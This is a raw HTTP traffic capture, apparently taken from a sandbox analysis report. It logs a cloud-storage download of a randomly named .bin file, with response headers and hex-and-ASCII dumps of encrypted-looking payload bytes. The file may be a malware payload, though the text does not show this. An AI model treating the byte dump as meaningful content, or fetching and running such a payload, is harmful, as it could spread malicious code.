                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                        Access-Control-Allow-Methods: GET,OPTIONS
                                                                        Content-Type: application/octet-stream
                                                                        Content-Disposition: attachment;filename="forceconnor36_zuPICrV252.bin";filename*=UTF-8''forceconnor36_zuPICrV252.bin
                                                                        Date: Tue, 28 Sep 2021 06:15:57 GMT
                                                                        Expires: Tue, 28 Sep 2021 06:15:57 GMT
                                                                        Cache-Control: private, max-age=0
                                                                        X-Goog-Hash: crc32c=8ZFIcQ==
                                                                        Content-Length: 221760
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Connection: close
                                                                        2021-09-28 06:15:57 UTC5INData Raw: 1e 61 60 e0 21 e5 63 be 1d ea 27 65 6b b5 bd 85 05 07 cf a9 a0 68 f2 76 31 8d b9 00 6c cd 65 f7 42 4a 73 37 3b 72 a8 a6 ef 75 c1 62 03 ca 4e 6d d8 b5 ad cd b0 aa 5e 55 d0 43 17 bb e5 ed 0e 43 64 25 ac 70 3f ce 64 00 37 44 33 4b a4 d1 7b 33 97 ae 5d 20 d7 e4 08 6b 49 ca dc eb 3b 6a 09 8a 4e 69 4a 17 c0 0d e3 c6 ce 5c 51 38 3b d4 7d a8 06 10 03 f1 ac da 68 53 47 ff fa 91 dc d5 18 8e 8b 57 75 b1 7e ee bc bb e9 10 5c 94 01 dd 61 7b fd b7 88 96 3e 12 78 6f b5 2c 47 6c 7f c2 90 be 47 db 17 35 a2 58 91 f6 a5 e0 ae fb c8 be 80 85 d0 5d 83 2f 94 87 ef 57 8d a6 db 93 0b 46 8a eb a0 90 3d 2d 4c 3e 8c 45 7b 46 8d 09 ac aa 56 00 1a d6 01 e3 16 e3 5f cc 04 78 7f 53 6d c2 54 25 6b da fc 69 e5 8c cf 08 01 6b 01 9b 42 87 62 ca cd b4 09 32 69 e5 94 0f e2 fb 36 08 11 40 32
                                                                        Data Ascii: a`!c'ekhv1leBJs7;rubNm^UCCd%p?d7D3K{3] kI;jNiJ\Q8;}hSGWu~\a{>xo,GlG5X]/WF=-L>E{FV_xSmT%kikBb2i6@2
                                                                        2021-09-28 06:15:57 UTC9INData Raw: 32 57 0e ed 90 4e 8d 42 85 cf 0b de 2e 81 04 43 af 38 9e 25 73 0c 95 7a 78 0f 01 fe 7d 95 28 1d ba 52 77 18 bc 5f 52 2f f7 cf 8b 26 45 0f 0e 54 1c 37 9a a7 ef ad 8d 5f 46 d7 88 1b 9d ac 16 3a 49 93 78 39 eb bf bd af 48 b0 8f 8d 7e 48 34 21 c9 4d 4a cd fc 91 1b 98 85 aa 73 30 05 b0 bd 49 19 b3 3b 4c 17 60 e0 38 f7 d9 4f 67 f5 36 b2 92 ae 9d 5b 50 d7 43 7a 07 bf 9f 51 ce 5e cf 66 a6 96 6f da cb 09 5e a1 bf a3 b2 e8 34 4a 12 cc de ec e6 8e ff f9 44 0e 34 44 df aa ea 9b e0 d7 27 74 eb 74 c1 25 03 fb c9 f0 c1 4b 67 54 68 c8 e4 9d d3 bf 43 26 c3 ac 46 b2 2e 41 b8 a1 35 2b 39 b6 32 61 4d 8d de 6d e1 81 50 f4 b8 2c c8 39 37 69 0b b8 6d 27 62 00 05 60 a7 1b a6 3a 3f f9 df 49 04 24 46 f6 24 54 6e a9 f8 d8 60 aa c8 50 25 5c 56 c6 20 8c d4 d9 bb 47 1f 9c dc 99 4a 37
                                                                        Data Ascii: 2WNB.C8%szx}(Rw_R/&ET7_F:Ix9H~H4!MJs0I;L`8Og6[PCzQ^fo^4JD4D'tt%KgThC&F.A5+92aMmP,97im'b`:?I$F$Tn`P%\V GJ7
                                                                        2021-09-28 06:15:57 UTC12INData Raw: 3c 9c 50 29 1f bd df 49 53 7b 8a 27 11 72 f8 72 cc f9 33 62 d3 f3 19 3d 9c ff 30 03 7a a5 b6 1d 1c 93 cc 58 7d 5e 68 09 3f 2e e6 80 96 ea 33 9a 02 9b d9 89 95 e6 f2 c0 23 e4 0a 7b ba 59 dd 1d 04 98 f9 67 14 d6 22 81 d9 ba 43 0b b2 30 53 46 22 cc fe f9 21 9f e1 d1 bf 36 22 0e 58 57 3d 48 a0 16 2e 52 cd 8f 1d 06 27 51 2d f8 c2 6b 22 36 3d 97 39 c2 b0 b1 95 24 02 bb 42 d8 b8 84 58 df 0b 51 dc 20 26 8a 25 dc f8 7f fe 1d 7c 5d 36 fa 65 97 22 61 7f 2a b2 29 7f 38 d2 20 dd 60 00 22 40 2c 40 a5 2f 57 3f 26 b0 23 38 d7 e4 0c c9 16 c6 cf ef 3b 7b 0d 95 5f 97 4b 3b cd 04 fc c8 b0 44 51 38 3f 76 62 ba 15 14 03 e0 a8 c0 96 52 6b e7 f3 86 74 ac 18 8e 8f 44 dd bd 56 34 b7 76 ce 80 27 d8 cc f6 97 08 87 c0 a8 f7 48 62 16 e3 d5 6d 6b 06 02 84 8e d3 33 fd d7 4f 88 39 e0 98
                                                                        Data Ascii: <P)IS{'rr3b=0zX}^h?.3#{Yg"C0SF"!6"XW=H.R'Q-k"6=9$BXQ &%|]6e"a*)8 `"@,@/W?&#8;{_K;DQ8?vbRktDV4v'Hbmk3O9
                                                                        2021-09-28 06:15:57 UTC16INData Raw: a9 6d a5 f5 7f f6 81 9e 22 f2 19 a3 35 36 f9 86 94 17 e6 a9 f5 08 d1 3d b0 31 1c 04 fe f8 8a 0e 8c 7f 2b e2 2e de d5 af 65 f7 28 e3 e6 96 f6 a2 9f 7a 88 e4 d7 6f c1 fe ae 54 e9 be cd 71 27 6c 40 fd 17 a0 b8 69 16 c6 52 44 79 bb 69 9d 74 31 e3 9f d6 75 9a 6e 21 83 1b 1f e5 b2 59 ac 52 a4 a0 cd b1 63 8b da 45 80 18 f1 6b 79 24 a7 7d 67 37 b0 b1 6c 9d 0a cb 92 1e 73 77 7c 30 02 25 29 ca a9 26 3f 0d 0e 58 60 46 b2 9f e5 aa e8 d3 46 c6 8a 3f 47 d8 2c 3c 26 54 17 6a e1 61 b8 a2 2e 85 8f 8b 62 73 3b 09 f1 47 5c f4 05 99 65 c4 ad 6b 79 3d 0a ac 2e 49 19 b3 f6 47 23 4c b8 6e f7 d3 56 56 d8 1f b7 98 7a 73 52 6d d9 62 f8 50 bf 99 34 d4 80 c5 64 54 9f 42 9d ab 09 5e a1 70 a8 b4 d2 34 4c 12 cc cc d5 d9 a6 1c f3 6c 26 59 82 d9 a0 c8 7d ef f2 05 9d eb 72 e1 36 27 d3 f0
                                                                        Data Ascii: m"56=1+.e(zoTq'l@iRDyit1un!YRcEky$}g7lsw|0%)&?X`FF?G,<&Tja.bs;G\eky=.IG#LnVVzsRmbP4dTB^p4Ll&Y}r6'
                                                                        2021-09-28 06:15:57 UTC18INData Raw: 12 ad dd 25 04 80 c5 6a a2 ea 67 b5 96 ab 4f eb 79 a3 fa e8 34 4a ba 03 8c ec aa 8e ff f9 44 47 34 44 df 88 ea a3 e0 d1 3c ad 84 a0 eb 25 09 d3 18 da c1 4d 4d 7a 13 c8 f4 7d ab b5 43 2c eb c4 46 b2 71 69 86 3a 35 2b 11 98 32 61 4b 50 53 6d 4c 2c 78 d1 a2 2c c2 2c 3f 5e 26 80 7a 26 68 de 6e 1e a9 0a a4 16 6f ca a9 6b e7 17 46 fc 0d 76 68 81 b4 c9 67 cf 75 1b 25 56 74 e4 37 e3 92 b6 23 4d 19 b6 82 c0 4a 37 6c 88 fe 75 8b 57 bc d0 c2 d1 e5 77 c4 ce 8c 6e 84 30 13 5c ce 1b 0b 81 84 94 08 0a 52 3d 9a 3d 6c 3b 1a 62 77 ae d0 6b 77 b4 34 a7 30 b7 83 cd 76 ee 78 5f 2e 9d 73 00 92 86 40 b8 4a 1d a7 f8 87 c3 6b 5f f0 0c 9a 09 9d c3 79 97 19 9d b3 8e 77 28 2e f4 05 ab ca 8d 39 c9 fe 97 88 71 97 97 8e 78 12 20 5d 9a 4c bf 57 18 70 22 6d e2 11 d6 83 29 15 15 e9 91 57
                                                                        Data Ascii: %jgOy4JDG4D<%MMz}C,Fqi:5+2aKPSmL,x,,?^&z&hnokFvhgu%Vt7#MJ7luWwn0\R==l;bwkw40vx_.s@Jk_yw(.9qx ]LWp"m)W
                                                                        2021-09-28 06:15:57 UTC19INData Raw: 67 00 1e ac fe cb 33 fb 74 50 82 2a e4 90 8f 89 c0 d5 8c f1 d3 b3 b7 32 e7 45 ba 8a e2 47 a9 a6 da 93 0b 46 8a ce fa d5 3d 23 00 3f 8f 76 64 12 87 67 ac aa 56 1a 1a d6 00 e3 f6 e3 5d 8f 05 79 74 5d 6d 9a 57 75 61 d2 fc 66 e5 8c cf 12 1f 1d 03 9b 42 a7 62 95 c7 b4 09 3c 69 e5 d4 62 e8 db 36 04 11 42 32 c2 c8 cd c7 21 3d 32 df b6 b8 12 1f a4 d8 04 f3 b3 c1 97 86 60 d8 6b 77 77 b4 fd 56 f2 80 9e 24 0b d5 a3 35 32 27 89 b1 9b db a9 f5 0d c2 20 98 13 1c 04 f5 26 8a 1f 84 e4 d4 e2 2e d6 ba 69 65 36 28 3d e9 bc de 95 9f 60 82 f7 c8 47 f9 fe ae aa 3d be dc 0a 0e d1 40 9a 1d cf 7e 66 16 cc 8c 51 5c 93 5f 9f 74 3b f0 5d f4 4d 9a c9 2a 5d 1b 8a e1 9a 49 a3 52 a2 cf 0b b1 63 81 04 49 a8 2f 5d 67 73 0c b7 7d 67 3d ba bd 7d 95 37 1a 92 1e 6f 18 ba 31 02 2f f7 c5 78 02
                                                                        Data Ascii: g3tP*2EGF=#?vdgV]yt]mWuafBb<ib6B2!=2`kwwV$52' &.ie6(=`G=@~fQ\_t;]M*]IRcI/]gs}g=}7o1/x
                                                                        2021-09-28 06:15:57 UTC20INData Raw: 20 76 81 95 9a 06 b6 41 53 b7 71 44 25 0f 4e 0d bf d4 77 a1 d3 1a a4 21 8c fb cd 67 e0 4e 61 2d b1 77 03 be be 38 41 9d 88 ad ef 57 e7 19 56 7e bd 76 99 a3 de 62 a7 17 89 27 8b 5f 10 06 f4 0f 64 e2 40 28 ce 86 93 fb af 92 81 bb 45 0e 76 2c 98 4c bd 53 8a 63 25 15 e8 14 b9 54 46 f5 1e c1 5c 41 85 9a 5d 15 7e 06 77 f6 0a 3b 1d f6 eb 79 38 f3 18 93 1c 71 a7 b5 72 ee 96 d3 50 92 58 6c de 34 31 eb ef 89 91 14 9f a0 80 fe 41 93 e6 e5 ec 1b f7 f4 70 f9 b5 d5 02 12 00 ca 47 14 d2 35 24 a9 71 51 0f b4 3e 5e d7 c9 cd d2 f3 3b 96 d8 ae ab 34 0c 5d 45 44 33 ea a0 02 26 5e 91 9f 21 12 50 58 05 de c6 c9 39 84 3b 9a 88 d7 a0 ba b9 42 12 45 49 e7 b9 9f 48 ac 09 79 fc 24 0e f6 87 c3 e3 ce eb 0d 76 5f 8f 15 74 a7 57 7f 67 54 ae 8b 6e 2c 6d 3a 6c 75 10 2d 47 91 5a 4b 06 00
                                                                        Data Ascii: vASqD%Nw!gNa-w8AWV~vb'_d@(Ev,LSc%TF\A]~w;y8qrPXl41ApG5$qQ>^;4]ED3&^!PX9;BEIHy$v_tWgTn,m:lu-GZK
                                                                        2021-09-28 06:15:57 UTC22INData Raw: 38 eb e2 2e d2 b0 b4 d6 f7 22 3d cc 9b e9 95 9f 70 8e f5 e1 b8 f9 fe a4 4d 33 9e dc 7d 0f d1 cd 86 11 cf 7f 64 c6 b0 8c 4b 5d bb 4a 9d 74 31 d8 80 ff 4d 90 67 a5 ea c3 b6 fe 9f 5f a6 43 a6 a0 0a b0 63 8b 0d 58 ad 3d f0 43 32 0c 9f 7b 41 3a 18 dd ad e9 22 1a 93 36 61 18 ba 3a 2a 2f f6 c5 86 62 53 25 9f 52 73 6c 2d b4 e3 bc f3 0b 55 de 91 10 be e3 0c 3a 4d 92 17 19 e9 be b7 8d 15 ba 9e 8f 07 61 1b 21 c3 4e 4d f9 4e f7 5c cf 84 aa 73 2c 04 d2 e0 26 1d b8 28 42 2e 26 8f 6e f1 ff 54 7c 9f f5 b7 98 7a a7 7a 44 d1 4a 1f 8e b0 8e 5c 03 89 f4 d1 a2 a8 67 b5 96 d7 5e bf 49 8d b6 ea 35 5c 18 12 cc c4 d1 8e e9 e5 6c 91 2c 44 d9 a1 d9 93 e4 d7 bd aa eb 72 c0 25 03 ea e0 f6 c3 4b 63 5f 6f ea f2 12 d7 9d bc 26 c3 a6 2b df 77 41 f0 36 4b 03 39 b6 36 49 0b 8d de 6b 64 29
                                                                        Data Ascii: 8."=pM3}dK]Jt1Mg_CcX=C2{A:"6a:*/bS%Rsl-U:Ma!NMN\s,&(B.&nT|zzDJ\g^I5\l,Dr%Kc_o&+wA6K96Ikd)
                                                                        2021-09-28 06:15:57 UTC23INData Raw: 14 d0 a4 03 c6 ae 54 71 96 21 57 5e f0 f3 ac d1 28 86 cd a9 8e 2e 5a 89 45 44 3d c6 06 04 00 74 1b c4 31 0a 28 61 00 03 91 6c 28 94 09 82 54 e5 b0 a0 95 23 21 53 3d d1 b6 8d 43 5c ab 6f cd 2c 0e c7 87 c3 ef 41 ff c0 5e 5e 2d 04 4c f2 29 68 61 56 b4 69 94 3c 70 3c b0 69 00 33 40 1b a4 59 2e 7d 1b 6f ae 5d 2a e4 fd 76 63 09 ca d8 c3 cb 68 09 8c 66 4d 4a 17 ca 8d eb c6 ce 58 8c c5 3d d4 7d d6 0e 10 03 f5 84 f4 6a 53 41 e9 d2 bf 5c d5 12 98 be ee cf bf 7e 24 bd 76 c8 ac 23 d0 cc fc 31 7c 5d c4 a8 ec 32 55 1f 1d d0 2e ae 0f 1e a6 24 af 1b fb 75 54 ed e3 e4 98 8f e6 2f db 8c fb ad 8d bd 32 e3 5c 92 a4 e2 5d a3 b0 f5 fc 75 4e 8a eb f4 ab 35 2d 00 3b e0 8c 6e 12 8d 75 76 c5 5e 01 1a dc 0b e5 de 12 5f cd 09 6f 5c 7d 6d 9a 5d 33 95 d3 ea 97 e4 f2 c7 08 1f 19 7c 93
                                                                        Data Ascii: Tq!W^(.ZED=t1(al(T#!S=C\o,A^^-L)haVi<p<i3@Y.}o]*vchfMJX=}jSA\~$v#1|]2U.$uT/2\]uN5-;nuv^_o\}m]3|
                                                                        2021-09-28 06:15:57 UTC24INData Raw: 6c f7 df 6d 50 f0 27 bd 18 78 ad 52 78 0c 1f 17 50 bf b7 5f 12 80 c3 01 83 91 67 bf f3 02 5f ab 69 a3 98 ea 34 4a 77 1b cd c4 db e1 f5 f2 6c 2a 20 ba d8 ff c0 bc f2 29 2c bc 15 73 b4 27 23 5f c8 d8 c1 b5 64 42 ef c9 ad 10 f3 10 43 26 c3 52 45 a4 89 40 a5 16 5f 23 b5 c9 32 61 4c e2 d2 6c 4c 26 3f e1 a3 2c c2 10 3c 5a 0e be 15 bb 62 00 1a 4c b2 08 28 6d 76 f9 de 2c 7c 16 46 fc a5 79 68 81 b6 05 bf a1 a7 1b 5b 54 5c c0 33 cb 89 da bb 4b 31 98 fc d7 40 b7 60 a0 bb 73 f5 59 94 87 c4 d3 6f 67 bc ce 8d 0b a0 6b 11 56 e0 17 72 81 8e 1e 13 48 40 7b a6 e6 49 3b 1c 4e d0 08 d1 61 5f d0 8e 8f 7b 9f ff cb 5e 07 52 9f 2a 8b 5d 06 bb 86 4a a8 51 6e db f0 81 eb 15 77 14 08 44 00 9d d0 79 97 19 09 a8 89 5f 14 16 9c 0e 75 ca 9b 92 e6 cd 99 88 77 bb 64 bf 56 0f 1e 1e b6 4c
                                                                        Data Ascii: lmP'xRxP_g_i4Jwl* ),s'#_dBC&RE@_#2aLlL&?,<ZbL(mv,|Fyh[T\3K1@`sYogkVrH@{I;Na_{^R*]JQnwDy_uwdVL
                                                                        2021-09-28 06:15:57 UTC25INData Raw: 69 cb d7 fc 24 08 8b f6 56 e7 60 76 0e 16 c5 47 b1 1c 15 b3 cd c2 28 fb 64 4b 9d 12 1a 99 a9 8e d1 c1 87 ee ea b6 a6 32 f6 51 a5 a1 1c 5c 85 ac ca 98 11 90 99 e0 ef f9 2e 36 00 2e 94 5a 64 ec 86 44 a1 bb 47 84 1e ed 1c e1 f6 e3 42 c6 1c 62 74 42 76 85 6b db 6a fe f0 6f f4 83 a0 20 1d 1d 04 84 7f b4 79 ca dc af 16 1c 97 e4 f8 01 e0 ca 3d 20 04 43 32 d2 db cb d9 0e 2e 29 df de a9 0d 09 54 d9 28 fd 36 da 9c ae 7c d9 6b 7d 7e a6 e2 40 e1 9b 9e 35 86 c0 bb cb 3d 0b 87 b3 2e da 81 e6 03 c2 2a 8b 1a 03 1d e7 3d 8a 0e 9f 48 f3 1c 2f f4 b1 78 6e e6 3a eb fa b8 c1 bb 8c 61 82 e6 d2 58 e5 00 af 72 22 96 cd 78 0f db 42 ec 1a de 6e 06 04 cd 8c 41 4f 9c 41 80 67 20 f0 91 e5 52 8a 90 2a 71 15 0c fc 91 61 be 53 a2 c5 18 a7 7c 90 17 52 a8 3e ea 72 8d 0d b3 70 65 2c 65 99
                                                                        Data Ascii: i$V`vG(dK2Q\.6.ZdDGBbtBvkjo y= C2.)T(6|k}~@5=.*=H/xn:aXr"xBnAOAg R*qaS|R>rpe,e
                                                                        2021-09-28 06:15:57 UTC27INData Raw: 5d fb 9a c1 d1 e9 77 a2 cf 8c 6e 84 38 11 5c ce 20 66 90 90 8f 0b 40 68 2f b2 66 68 28 0e 4d 61 8d d0 61 5f d2 36 a7 16 df a4 ee 76 e4 50 9f 2c 9d 85 17 e2 ae d1 be 62 7d 12 ef 57 66 3a 5f f0 0b 57 15 a4 e6 68 84 14 e5 83 89 5f 10 2e f4 0f 55 8a c2 02 d1 81 99 82 59 b3 80 bd 5c 0d 20 21 9b 4c bf 10 c2 73 22 61 df 06 a8 54 38 06 19 d9 72 06 7b 9b 25 1d 79 db d9 e0 f4 3a 6c de ca 7b 39 85 d1 c3 1c 77 b0 a1 1a d0 0f d3 56 83 77 73 04 36 3b c5 c6 8e ea 39 43 22 84 d6 9a 99 c6 e7 44 3c f7 c7 00 95 46 d8 6d 09 81 d1 4d 7b c8 25 23 cc 86 02 0f b2 27 44 4d cd da c3 e2 20 ae 99 be bd 30 37 b9 42 28 1a 48 b1 12 31 58 33 ae 71 51 0d 4c 05 de c2 6b 28 64 1d c5 02 57 b0 a0 9b 8c 05 93 ce df b6 8d 46 c1 0a 68 e9 31 30 8b eb e0 e9 6c fa 1d 6d 59 0d 44 3f 93 36 69 67 5e
                                                                        Data Ascii: ]wn8\ f@h/fh(Maa_6vP,b}Wf:_Wh_.UY\ !Ls"aT8r{%y:l{9wVws6;9C"D<FmM{%#'DM 07B(H1X3qQLk(dWFh10lmYD?6ig^
                                                                        2021-09-28 06:15:57 UTC28INData Raw: 24 f9 bd f5 02 c8 08 ac 08 1c 0e 80 34 8a 1f 9f 44 d9 f3 29 c9 bd e7 d2 ef f8 2b 75 c0 fb 94 9f 70 91 ff d8 4f ed d6 b4 5d 37 b8 cb f4 08 d1 40 fc 02 c3 6f 65 00 dd 89 63 4d 93 5e 97 d6 2a fc 93 f5 5c 91 7a 3f 4a 96 21 ed 9a 48 be 5f b3 c2 1d a6 ff 90 09 61 0b 2f f1 61 62 01 89 ed 4b 36 7f ba 6b 0f 0a 0b 92 1e 7f 0b bf 44 10 2f f7 de 81 d0 04 1c 06 7e 74 77 92 c8 b2 aa e2 07 9a de 93 10 bd 8d 2c 3a 4f 99 1e 19 c8 be b7 8d 15 bb 9e 82 79 67 75 03 c8 47 56 f2 05 95 65 c5 a9 ad 68 34 63 94 e8 49 13 65 20 62 06 64 8f 6f eb d9 45 76 f0 c9 b7 c8 4e ac 5e 7c d1 4a 15 52 bf c4 5a 1e e7 c4 62 8a 90 67 b5 8f 39 5b ab 0a 8b 9c ea 0c 4c 18 03 da c8 fa ef ff fb 7b de 37 68 db b8 ce a3 e8 ce d3 ab c7 7c e9 33 04 ed ca 56 76 63 50 55 11 c2 e8 1e d3 bd 5b d8 c2 80 57 b0
                                                                        Data Ascii: $4D)+upO]7@oecM^*\z?J!H_a/abK6kD/~tw,:OyguGVeh4cIe bdoEvN^|JRZbg9[L{7h|3VvcPU[W
                                                                        2021-09-28 06:15:57 UTC29INData Raw: 82 ce e4 d5 3a e6 dc 15 ac 56 d4 08 ca 8c c0 61 38 d1 35 05 a9 f9 50 0f b8 fd 50 50 02 d4 d5 f8 f6 93 ce b4 63 27 01 84 72 44 39 42 a2 3b 19 60 33 8e 3b d4 2e 4b 2f d8 e8 2a 54 94 22 9e 2a c6 b0 14 91 3b 12 64 43 f4 b6 58 47 d2 1c 68 fc 20 26 8c 87 c3 e9 6e fa 1d 6d ae 2d 04 64 9a 29 68 67 4c ab 29 7f 2d 70 3c ce 64 00 33 44 31 4b 5b 2e 7c 31 2f ae a8 20 d7 e4 f4 69 09 ca d0 eb 3b 6a 09 8a 4e 69 48 17 c0 0d 49 c5 ce 5c 7e 38 3b d4 a4 ab 06 10 0f f1 ac da 68 53 47 ff fa 91 5c d5 1e 8e 85 48 24 bc 7e 5a 44 75 c8 a8 52 d8 cc fc 2f 13 94 c5 bb d6 49 7d 90 1d d4 41 5d 0f 1e bd e8 c2 37 c3 f5 50 82 2a e4 89 81 90 3e da a0 fa d1 ac 95 09 e6 4a b0 81 f8 4e ad a6 ca 97 17 b8 8b c7 ff d7 34 47 08 29 e5 42 46 2e 86 68 a6 b7 45 04 1a c7 05 fb 08 e2 71 cb 10 19 79 4a
                                                                        Data Ascii: :Va85PPPc'rD9B;`3;.K/*T"*;dCXGh &nm-d)hgL)-p<d3D1K[.|1/ i;jNiHI\~8;hSG\H$~ZDuR/I}A]7P*>JN4G)BF.hEqyJ
                                                                        2021-09-28 06:15:57 UTC31INData Raw: dd 84 aa 73 2c 08 b7 fa 49 19 a2 47 5e 07 64 85 63 e8 c2 56 7b f0 36 b8 87 65 53 53 50 df 5b 1f 46 25 b7 4a 12 80 cf 65 95 86 74 ba 9c 18 51 b1 9d 8a b0 e6 2b 5c 95 39 cc c4 d0 9d f8 e8 7f 2f 36 55 d6 bf cc 5d e1 fb 23 bb e1 64 71 0d 12 fb c8 d2 ca 54 6a 47 1e c8 e3 1d cc ac bd 27 ef 80 55 bf 63 69 7b 38 35 27 2e 3b 35 61 4d 8c cd 63 5d 22 46 f7 a8 36 52 10 3d 59 0e b2 d8 37 6c 14 04 77 b1 22 0c 12 76 f3 c0 59 63 18 46 e7 2a 49 96 80 9e db 78 b3 a8 1b 34 53 4a 3e 36 cf 9b ce a8 42 19 ad f3 c8 56 c9 69 8c b9 5c 8e 69 0f 7c 3f 2e e5 6c 99 ce 8c 66 86 71 21 54 c8 63 72 81 84 a2 1b 48 51 57 af 65 6e 3d 34 82 0d ae da 49 41 d1 36 a1 1e bb ff cd 7c e9 42 9c 38 8e 71 3a bf 90 52 bf 74 64 a0 ea 84 fd 02 59 e2 0c 50 15 b2 e6 7e 81 3b d3 a0 89 59 36 29 dc 4e 74 ca
                                                                        Data Ascii: s,IG^dcV{6eSSP[F%JetQ+\9/6U]#dqTjG'Uci{85'.;5aMc]"F6R=Y7lw"vYcF*Ix4SJ>6BVi\i|?.lfq!TcrHQWen=4IA6|B8q:RtdYP~;Y6)Nt
                                                                        2021-09-28 06:15:57 UTC32INData Raw: b7 91 54 cc e6 8f a9 4c d6 95 64 56 b5 7e d2 56 5c f4 c1 fb 5a 5e 95 c4 a2 fe 7f 49 08 37 cf 4d 67 07 06 52 ff fd 3f f9 67 51 aa 64 e5 98 8f a4 22 c2 80 f1 db b2 43 33 cb 48 a2 86 e2 55 bf 58 da bf 09 51 86 eb f8 ce c3 2c 2c 3d a4 47 45 a3 9d 42 ac aa 56 1b 2a d4 01 d5 f6 e3 5d cd 0f 79 74 51 40 9b 7d 27 04 2b fc 69 ef a0 da 0a 08 72 f8 9b 42 ad bc c6 e5 83 09 32 63 cd ec 0f e2 d1 e8 08 13 2d c9 d8 c8 c7 18 2d 15 05 df cf b8 3a 27 aa d8 0e 2d 34 e1 97 86 6e c4 6b 77 6d b4 f1 57 fb 95 9e 28 87 df a3 34 3c 27 a8 b1 37 f8 a9 f9 18 c2 20 99 12 2c 06 f4 01 8a 1f 84 57 de e2 2e da 97 68 4f f5 36 52 a6 b2 de 9f 9d 6e ed a7 c8 47 f3 fc c1 0f 36 be d6 a7 03 f9 77 fd 11 c5 56 51 16 cc 86 95 5c b9 5e 9c 64 3b f0 80 fe 49 9a 78 31 5d 17 14 ed 9a 48 b6 62 a7 cf da b0
                                                                        Data Ascii: TLdV~V\Z^I7MgR?gQd"C3HUXQ,,=GEBV*]ytQ@}'+irB2c--:'-4nkwmW(4<'7 ,W.hO6RnG6wVQ\^d;Ix1]Hb
                                                                        2021-09-28 06:15:57 UTC33INData Raw: e5 eb 8e ba 4d 13 c6 e5 de c4 80 be a8 35 c0 5d 46 4e 90 16 5c c8 18 bc cf 86 62 ba 7d 8d 5a df 3a fc 36 30 02 12 5e 46 67 bb e8 d9 13 04 4b 0d a4 d6 79 56 5c 81 71 3e 11 48 79 ea ec 46 99 35 94 fb 9f 6d 8e ce 09 4a 6f a4 f8 8b ed 3b 41 f2 22 57 36 bc f4 4f 96 13 89 e9 89 5f 01 38 e7 0b 4d e2 98 2a ce 80 88 8c 6c 6d 80 91 5d 00 1f a6 a1 aa b9 7f db 6c 31 6f f3 05 bd 4b d7 14 33 ed 5c 43 53 bd 20 0e 78 1e fe e7 f4 3a 7c d1 dc 7e 17 bb fa 92 1a d5 b1 a5 35 23 95 d3 50 21 58 50 10 22 26 c5 59 8e ea 39 b8 bc 97 d2 9a 80 e2 fb 3a 3d db fd 78 18 e0 c2 32 03 99 c2 43 14 c7 20 3a 38 af 7c 0b 98 3b 44 5e dc dc d6 e8 d6 87 e5 b7 ce 6e 25 ac 4f 4e 22 5b b5 12 20 5c 2f 70 30 26 17 4a 11 f6 e4 68 28 92 3a 11 2d c6 b0 a1 9a 3c 04 6d 6b f7 b6 8b e5 d5 0b 7d 5e 27 2a 84
                                                                        Data Ascii: M5]FN\b}Z:60^FgKyV\q>HyF5mJo;A"W6O_8M*lm]l1oK3\CS x:|~5#P!XP"&Y9:=x2C :8|;D^n%ON"[ \/p0&Jh(:-<mk}^'*
